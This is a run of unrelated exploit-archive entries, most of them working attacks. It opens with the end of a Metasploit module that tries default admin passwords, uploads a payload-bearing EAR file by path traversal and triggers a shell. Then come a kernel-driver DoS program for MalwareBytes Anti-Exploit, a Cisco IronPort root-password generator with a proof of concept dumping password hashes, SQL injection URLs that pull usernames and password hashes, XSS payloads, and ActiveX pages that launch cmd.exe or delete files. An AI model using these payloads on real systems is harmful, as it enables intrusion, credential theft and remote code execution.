# First we get a valid JSESSIONID to pass to authenticate()
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
if res && res.code == 200
cookie = res.get_cookies
authenticated = authenticate(cookie, datastore['USERNAME'], datastore['PASSWORD'])
if authenticated
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
authenticated = authenticate(cookie, 'administrator', 'administrator')
if authenticated
return cookie
else
# Try one more time with the default admin login for some versions
authenticated = authenticate(cookie, 'admin', 'admin')
if authenticated
return cookie
end
end
end
end
nil
end
def send_multipart_request(cookie, payload_name, payload_str)
if payload_name =~ /\.ear/
upload_path = '../../server/default/deploy'
else
upload_path = rand_text_alpha(4+rand(4))
end
post_data = Rex::MIME::Message.new
if @my_target == targets[1]
# old style
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part(payload_name, nil, nil, "form-data; name=\"filename\"")
post_data.add_part('', nil, nil, "form-data; name=\"vecPath\"")
post_data.add_part('', nil, nil, "form-data; name=\"vec\"")
post_data.add_part('AttachFile', nil, nil, "form-data; name=\"theSubmit\"")
post_data.add_part('WorkOrderForm', nil, nil, "form-data; name=\"formName\"")
post_data.add_part(upload_path, nil, nil, "form-data; name=\"component\"")
post_data.add_part('Attach', nil, nil, "form-data; name=\"ATTACH\"")
else
post_data.add_part(upload_path, nil, nil, "form-data; name=\"module\"")
post_data.add_part(payload_str, 'application/octet-stream', 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{payload_name}\"")
post_data.add_part('', nil, nil, "form-data; name=\"att_desc\"")
end
data = post_data.to_s
res = send_request_cgi({
'uri' => normalize_uri(@my_target['attachment_path']),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => cookie
})
return res
end
def pick_target
return target if target.name != 'Automatic'
version = get_version
if (version[0] <= 7 && version[2] < 7016 && version[3] == 'sd') ||
(version[0] == 4 && version[3] == 'ae') ||
(version[3] == 'sc')
# These are all "old style" versions (sc is always old style)
return targets[1]
elsif version[3] == 'it'
return targets[3]
else
return targets[2]
end
end
def exploit
if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable")
end
print_status("#{peer} - Selecting target...")
@my_target = pick_target
print_status("#{peer} - Selected target #{@my_target.name}")
if @my_target == targets[3]
cookie = login_it360
else
cookie = login
end
if cookie.nil?
fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
end
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
app_xml << '<application>'
app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + '.war', war_payload.to_s)
ear_file.add_file('META-INF/application.xml', app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + '.ear'
if @my_target != targets[3]
# Linux doesn't like it when we traverse non existing directories,
# so let's create them by sending some random data before the EAR.
# (IT360 does not have a Linux version so we skip the bogus file for it)
print_status("#{peer} - Uploading bogus file...")
res = send_multipart_request(cookie, rand_text_alphanumeric(4 + rand(32 - 4)), rand_text_alphanumeric(4 + rand(32 - 4)))
if res && res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Bogus file upload failed")
end
end
# Now send the actual payload
print_status("#{peer} - Uploading EAR file...")
res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
if res && res.code == 200
print_status("#{peer} - Upload appears to have been successful")
else
fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
end
10.times do
select(nil, nil, nil, 2)
# Now make a request to trigger the newly deployed war
print_status("#{peer} - Attempting to launch payload in deployed WAR...")
res = send_request_cgi({
'uri' => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
/*
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date - 19th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.malwarebytes.org
Tested Version - 1.03.1.1220, 1.04.1.1012
Driver Version - no version set - mbae.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/114249
CVE ID - CVE-2014-100039
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 25
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE sizebytes[4] = "\xff\xff\xff\x00";
BYTE *inbuffer;
printf("-------------------------------------------------------------------------------\n");
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, BUFSIZE);
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to DoS . . .");
getch();
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoS buffer sent\n\n");
CloseHandle(hDevice);
return 0;
}
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8
#Privilege Escalation in RedaxScript 2.1.0
RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The
issue occurs because the application fails to properly implement access
controls. The application also fails to perform proper sanity checks on the
user supplied input before processing it. These two flaws led to a
vertical privilege escalation. This can be achieved by a simply tampering
the parameter values. An attacker can exploit this issue to gain elevated
privileges to the application.
*Steps to reproduce the instance:*
· login as a non admin user
· Go to account and update the account.
· intercept the request and add “*groups[]=1*” to the post data and
submit the request
· Log out of the application and log in again. You can now browse
the application with admin privileges.
This vulnerability was addressed in the following commit.
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified
*Timeline*:
09-26-2014: Issue identified
09-27-2014: Discussion with the vendor
10-27-2014: Issue confirmed
11-05-2014: Patch released.
Author: Shyamkumar Somana
Vendor Homepage: http://redaxscript.com/download
Version: 2.1.0
Tested on: Windows 7
--
[image: --]
shyam kumar
[image: http://]about.me/shyamkumar.somana
<http://about.me/shyamkumar.somana?promo=email_sig>
Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam |
in.linkedin.com/in/sshyamkumar/ |
source: https://www.securityfocus.com/bid/48223/info
Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
/*
Cisco Ironport Appliances Privilege Escalation Vulnerability
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.5.5-280
Cisco Ironport WSA - AsyncOS 8.0.5-075
Cisco Ironport SMA - AsyncOS 8.3.6-0
Date: 22/05/2014
Credits: Glafkos Charalambous
CVE: Not assigned by Cisco
Disclosure Timeline:
19-05-2014: Vendor Notification
20-05-2014: Vendor Response/Feedback
27-08-2014: Vendor Fix/Patch
24-01-2015: Public Disclosure
Description:
Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation.
By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations.
The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.
Vendor Response:
As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account.
[SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password.
[GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access.
[SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528
Technical Details:
By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access.
This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service.
Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance.
Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.
PoC:
Enable Service Account
----------------------
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
Generate Service Account Password
---------------------------------
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
Login to the appliance as Service account with root privileges
--------------------------------------------------------------
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include "md5.h"
#include "getopt.h"
#define MAX_BUFFER 128
#define SECRET_PASS "woofwoof"
void usage(char *name);
void to_lower(char *str);
void fuzz_string(char *str);
int main(int argc, char *argv[]) {
if (argc < 2) { usage(argv[0]); }
int opt;
int index;
char *temp_pass = { 0 };
char *serial_no = { 0 };
char *secret_pass = SECRET_PASS;
char service[MAX_BUFFER] = { 0 };
unsigned char digest[16] = { 0 };
while ((opt = getopt(argc, argv, "p:s:h")) != -1) {
switch (opt)
{
case 'p':
temp_pass = optarg;
break;
case 's':
serial_no = optarg;
break;
case 'h': usage(argv[0]);
break;
default:
printf_s("Wrong Argument: %s\n", argv[1]);
break;
}
}
for (index = optind; index < argc; index++) {
usage(argv[0]);
exit(0);
}
if (temp_pass == NULL || serial_no == NULL) {
usage(argv[0]);
exit(0);
}
if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) {
to_lower(serial_no);
fuzz_string(temp_pass);
strcpy_s(service, sizeof(service), temp_pass);
strcat_s(service, sizeof(service), serial_no);
strcat_s(service, sizeof(service), secret_pass);
MD5_CTX context;
MD5_Init(&context);
MD5_Update(&context, service, strlen(service));
MD5_Final(digest, &context);
printf_s("Service Password: ");
for (int i = 0; i < sizeof(digest)-12; i++)
printf("%02x", digest[i]);
}
return 0;
}
void fuzz_string(char *str) {
while (*str){
switch (*str) {
case '1': *str = 'i'; break;
case '0': *str = 'o'; break;
case '_': *str = '-'; break;
}
str++;
}
}
void to_lower(char *str) {
while (*str) {
if (*str >= 'A' && *str <= 'Z') {
*str += 0x20;
}
str++;
}
}
void usage(char *name) {
printf_s("\nUsage: %s -p password -s serial\n", name);
printf_s(" -p <password> | Cisco Service Temp Password\n");
printf_s(" -s <serial> | Cisco Serial Number\n");
printf_s(" -h | This Help Menu\n");
printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
exit(0);
}
source: https://www.securityfocus.com/bid/48464/info
Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability.
Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip
#######################################################################
Luigi Auriemma
Application: Sybase Advantage Server
http://www.sybase.com/products/databasemanagement/advantagedatabaseserver
Versions: <= 10.0.0.3
Platforms: Windows, NetWare, Linux
Bug: off-by-one
Exploitation: remote, versus server
Date: 27 Jun 2011 (found 29 Oct 2010)
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"Advantage Database Server is a full-featured, easily embedded,
client-server, relational database management system that provides you
with Indexed Sequential Access Method (ISAM) table-based and SQL-based
data access."
#######################################################################
======
2) Bug
======
By default the Advantage server (ADS process) listens on the UDP and
TCP ports 6262 and optionally is possible to specify also a so called
"internet port" for non-LAN connections.
The problem is enough unusual and affects the code that handles a
certain type of packets on the UDP port.
In short the server does the following:
- it uses memcpy to copy the data from the packet into a stack buffer
of exactly 0x2b8 bytes (handled as 0x2b9 bytes)
- later this data is handled as a string but no final NULL byte
delimiter is inserted
- there is also an off-by-one bug since one byte overwrites the lower
8bit value of a saved element (a stack pointer 017bff??)
- after this buffer are located some pushed elements and obviously the
return address of the function
- it calls the OemToChar API that changes some bytes of the buffer
(like those major than 0x7f) till it reaches a 0x00 that "luckily" is
after the return address
- so also the return address gets modified, exactly from 0084cb18 to
00e42d18 that ironically is a valid stack frame somewhat related to
the starting of the service
- the data inside this stack address doesn't seems changeable from
outside and has tons of 0x00 bytes that in this case act like NOPs
till the zone around 00ebf05b where are located some pushed elements
- the EBX register contains two bytes of the attacker's data and EBP
points to such data
the following is a resume of these operations:
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa�{
017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .�&�q��{..˄....
|---------|
original return address
0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>]
017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa�{
017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .�&-q+�{..-�....
|---------|
new return address
00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
...
00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .�x�|J��| ...���
00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .���.....h��....
00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\��.�.�w���....
00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...�.�w.��...
00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|..
00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u.........
00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......�.......
the code flow usually arrives till 00ebf0ab or other addresses close
to it depending by the data saved there when the service started.
Now for exploiting this vulnerability would be required the presence of
a "jmp ebp" or "call ebp" or a sequence of instructions with a similar
result in the 00ebf05b zone which looks like an enough rare event.
I have not tested the Linux and NetWare platforms so I don't know if
the problem exists also there and if there are more chances of
exploiting it.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/ads_crc.zip
udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592
#######################################################################
======
4) Fix
======
No fix.
UPDATE:
vendor has fixed the bug in version 10.10.0.16 released in July 2011:
http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff
#######################################################################
source: https://www.securityfocus.com/bid/48462/info
Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input.
Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition.
Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip
source: https://www.securityfocus.com/bid/48455/info
Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Mambo CMS 4.6.5 is vulnerable; other versions may also be affected;
http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32
http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20
http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS
http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS
http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent
http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment
http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis
http://www.example.com/mambo/administrator/index2.php?option=com_categories§ion=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
source: https://www.securityfocus.com/bid/48393/info
Easewe FTP OCX ActiveX control is prone to multiple insecure-method vulnerabilities.
Attackers can exploit these issues to perform unauthorized actions or execute arbitrary programs. Successful exploits may result in compromise of affected computers.
Easewe FTP OCX ActiveX control 4.5.0.9 is vulnerable; other versions may also be affected.
1.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Execute arg1 ,arg2 ,arg3
End Sub
</script>
</html>
2.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="c:\windows\system32\cmd.exe"
arg2=""
arg3=1
target.Run arg1 ,arg2 ,arg3
End Sub
</script>
</html>
3.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_create"
target.CreateLocalFile arg1
End Sub
</script>
</html>
4.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="Directorypath\Directory"
target.CreateLocalFolder arg1
End Sub
</script>
</html>
5.
<html>
<object classid='clsid:31AE647D-11D1-4E6A-BE2D-90157640019A' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg1="FilePath\Filename_to_delete"
target.DeleteLocalFile arg1
End Sub
</script>
</html>
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description There is Insecure Method in (LocalFileCreate) fonction<br>
Found By : coolkaveh<br>
<title>Exploited By : coolkaveh </title>
<BODY>
<object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>
<SCRIPT>
function Do_it()
{
File = "kaveh.txt"
cyber.LocalFileCreate(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click
here To Test"><br>
</body>
</HTML>
source: https://www.securityfocus.com/bid/48166/info
The GD Star Rating plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/gd-star-rating/ajax.php?_wpnonce=<insert_valid_nonce>&vote_type=cache&vote_domain=a&votes=asr.1.xxx.1.2.5+limit+0+union+select+1,0x535242,1,1,co
ncat(0x613a313a7b733a363a226e6f726d616c223b733a323030303a22,substring(concat((select+concat(user_nicename,0x3a,user_email,0x3a,user_login,0x3a,user_pass)+from+wp_users+where+length(user_pass)%3E0+order+by+id+limit+0,1),repeat(0x20,2000)),1,2000),0x223b7d),1,1,1+limit+1
source: https://www.securityfocus.com/bid/48167/info
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
#!/opt/perl/5.12/bin/perl
use strict;
use warnings;
use Data::FormValidator;
"some_unrelated_string" =~ m/^.*$/;
my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};
my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');
source: https://www.securityfocus.com/bid/48215/info
The Pacer Edition CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The Pacer Edition CMS RC 2.1 is vulnerable; prior versions may also be affected.
<html>
<title>Pacer Edition CMS 2.1 Remote XSS POST Injection Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script>
<form action="http://www.example.com/admin/login/forgot/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss">
<input type="hidden" name="url" value="1" />
<input type="hidden" name="email" value='%F6"+onmouseover=prompt(31337)' />
<input type="hidden" name="button" value="Send%20Details" />
</form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a>
</body>
</html>
source: https://www.securityfocus.com/bid/48389/info
Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL-pointer-dereference error.
An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition.
Wireshark 1.4.5 is vulnerable.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap
source: https://www.securityfocus.com/bid/48217/info
Tolinet Agencia is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/index.php?tip=art&id=2' <- blind sql
source: https://www.securityfocus.com/bid/48391/info
Eshop Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/path/catalogue.php?id_shop=7[SQLI]
http://www.example.com/path/article.php?id_article=7[SQLI]
http://www.example.com/path/banniere.php?id_article=7[SQLI]
http://www.example.com/path/detail_news.php?id_article=7[SQLI]
